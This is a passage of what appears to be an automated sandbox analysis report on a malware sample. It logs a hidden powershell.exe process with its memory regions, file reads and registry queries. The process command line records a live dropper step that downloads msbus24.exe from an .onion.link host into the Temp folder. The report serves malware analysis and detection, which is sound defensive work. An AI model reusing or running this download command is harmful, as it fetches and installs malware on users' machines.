Sleep	duration = 100 milliseconds (0.100 seconds)		171	Fn
Get Time	type = System Time, time = 2017-07-25 12:15:17 (UTC)		1	Fn

Process #5: powershell.exe

(Host: 384, Network: 0)

Information	Value
ID	#5
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:02:27, Reason: Child Process
Unmonitor	End Time: 00:02:35, Reason: Terminated by Timeout
Monitor Duration	00:00:08

OS Process Information

Information	Value
PID	0x938
Parent PID	0xa08 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f3e9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 92C 0x 924 0x 920 0x 928 0x 91C 0x 918

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000c0000	0x000c0000	0x001bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001c6fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001d0000	0x001d0000	0x001dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001f0000	0x001f0000	0x0026ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000270000	0x00270000	0x003f7fff	Pagefile Backed Memory	Readable	Region Actions
powershell.exe.mui	0x00400000	0x00402fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000430000	0x00430000	0x00430fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00440fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x00451fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x006e0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x01aeffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001af0000	0x01af0000	0x01beffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001bf0000	0x01bf0000	0x01bf0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001c00000	0x01c00000	0x01c01fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x01c10000	0x01c13fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x01c20000	0x01c39fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001c40000	0x01c40000	0x01c40fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x01c50000	0x01c53fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001c60000	0x01c60000	0x01c60fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c70000	0x01c70000	0x01c7ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001c80000	0x01c80000	0x01d5efff	Pagefile Backed Memory	Readable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db	0x01d60000	0x01d8ffff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001d90000	0x01d90000	0x01d92fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001da0000	0x01da0000	0x01da0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001dc0000	0x01dc0000	0x01dcffff	Private Memory	Readable, Writable	Region Actions
l_intl.nls	0x01dd0000	0x01dd2fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001de0000	0x01de0000	0x01e5ffff	Private Memory	Readable, Writable, Executable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01e60000	0x01ec5fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01f4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f50000	0x01f50000	0x01f50fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f60000	0x01f60000	0x01f7ffff	Private Memory		Region Actions
sorttbls.nlp	0x01f80000	0x01f84fff	Memory Mapped File	Readable	Region Actions
sortkey.nlp	0x01f90000	0x01fd0fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001fe0000	0x01fe0000	0x0205ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02060000	0x0232efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002330000	0x02330000	0x02722fff	Pagefile Backed Memory	Readable	Region Actions
microsoft.wsman.runtime.dll	0x02730000	0x02737fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000002740000	0x02740000	0x02740fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002750000	0x02750000	0x02750fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002750000	0x02750000	0x02760fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000002780000	0x02780000	0x027fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x028cffff	Private Memory	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x028d0000	0x0298ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000029b0000	0x029b0000	0x02a2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a30000	0x02a30000	0x02b2ffff	Private Memory	Readable, Writable	Region Actions
mscorrc.dll	0x02b30000	0x02b83fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002ba0000	0x02ba0000	0x02c1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c20000	0x02c20000	0x1ac1ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001ac20000	0x1ac20000	0x1b2effff	Private Memory	Readable, Writable	Region Actions
private_0x000000001b2f0000	0x1b2f0000	0x1b3f0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000001b410000	0x1b410000	0x1b48ffff	Private Memory	Readable, Writable	Region Actions
system.management.automation.dll	0x1b490000	0x1b771fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000001b780000	0x1b780000	0x1b87ffff	Private Memory	Readable, Writable	Region Actions
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x74970000	0x74a38fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77600000	0x7771efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77720000	0x77819fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77820000	0x779c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x779e0000	0x779e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
powershell.exe	0x13f740000	0x13f7b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fef0450000	0x7fef05e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fef05f0000	0x7fef0c94fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fef0ca0000	0x7fef17fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x7fef1800000	0x7fef2222fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fef2260000	0x7fef23cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fef23d0000	0x7fef25e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fef25f0000	0x7fef34cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fef34d0000	0x7fef3e6cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fef4150000	0x7fef418dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fef4190000	0x7fef42a7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fef42b0000	0x7fef4394fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fef43a0000	0x7fef4449fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7fef4450000	0x7fef44b8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef44c0000	0x7fef4558fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef4570000	0x7fef45defff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x7fef46b0000	0x7fef46b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fef46c0000	0x7fef49edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fef49f0000	0x7fef4aa1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fef4b40000	0x7fef4b71fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef8d60000	0x7fef8d6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef8d70000	0x7fef8da3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef94a0000	0x7fef951ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef9580000	0x7fef958efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fefa6d0000	0x7fefa726fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefb310000	0x7fefb31afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefb340000	0x7fefb358fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefb7f0000	0x7fefb81cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefc0c0000	0x7fefc115fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefc120000	0x7fefc24bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefc2a0000	0x7fefc493fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc930000	0x7fefc93bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefcb10000	0x7fefcb2dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefcd60000	0x7fefcda6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefd060000	0x7fefd076fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefd560000	0x7fefd582fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd6a0000	0x7fefd6aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefd770000	0x7fefd77efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd900000	0x7fefd935fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd940000	0x7fefd9aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefdb20000	0x7fefdb39fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefdb40000	0x7fefdbdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefdbe0000	0x7fefdc78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe060000	0x7fefe0c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefe0d0000	0x7fefe1d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7fefe280000	0x7fefe356fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7fefe360000	0x7fefe536fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefe550000	0x7fefe55dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefe560000	0x7fefe5d0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefe5e0000	0x7fefe7e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe870000	0x7fefe89dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7fefe8a0000	0x7fefe8befff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefe8c0000	0x7fefe988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefe9b0000	0x7fefeadcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefeae0000	0x7feff867fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7feff870000	0x7feff94afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7feffad0000	0x7feffb21fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feffb40000	0x7feffb40fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00040000	0x7ff00040000	0x7ff0004ffff	Private Memory		Region Actions
private_0x000007ff00050000	0x7ff00050000	0x7ff0005ffff	Private Memory		Region Actions
private_0x000007ff00060000	0x7ff00060000	0x7ff000fffff	Private Memory		Region Actions
private_0x000007ff00100000	0x7ff00100000	0x7ff0010ffff	Private Memory		Region Actions
private_0x000007ff00110000	0x7ff00110000	0x7ff0017ffff	Private Memory		Region Actions
private_0x000007ff00180000	0x7ff00180000	0x7ff0018ffff	Private Memory		Region Actions
private_0x000007ff00190000	0x7ff00190000	0x7ff0019ffff	Private Memory		Region Actions
private_0x000007fffff00000	0x7fffff00000	0x7fffff0ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000007fffff10000	0x7fffff10000	0x7fffff9ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000007fffffae000	0x7fffffae000	0x7fffffaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions
For performance reasons, the remaining 15 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

File (191)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Get Info			2	Fn
Get Info			1	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml		3	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			2	Fn
Get Info			9	Fn
Get Info			1	Fn
Get Info			4	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 4096	44	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 3315	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 781, size_out = 0	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 0	2	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	size = 4096, size_out = 436	1	Fn Data
Read		size = 4096, size_out = 4096	81	Fn Data
Read		size = 4096, size_out = 2530	1	Fn Data
Read		size = 542, size_out = 0	1	Fn Data
Read		size = 4096, size_out = 0	5	Fn Data
Read		size = 4096, size_out = 4018	1	Fn Data
Read		size = 78, size_out = 0	1	Fn Data
Read		size = 4096, size_out = 2762	1	Fn Data
Read		size = 310, size_out = 0	1	Fn Data
Read		size = 4096, size_out = 3022	1	Fn Data
Read		size = 50, size_out = 0	1	Fn Data
Read		size = 4096, size_out = 281	1	Fn Data

Registry (177)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment		1	Fn
Open Key	HKEY_CURRENT_USER\Environment		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		9	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Environment	value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
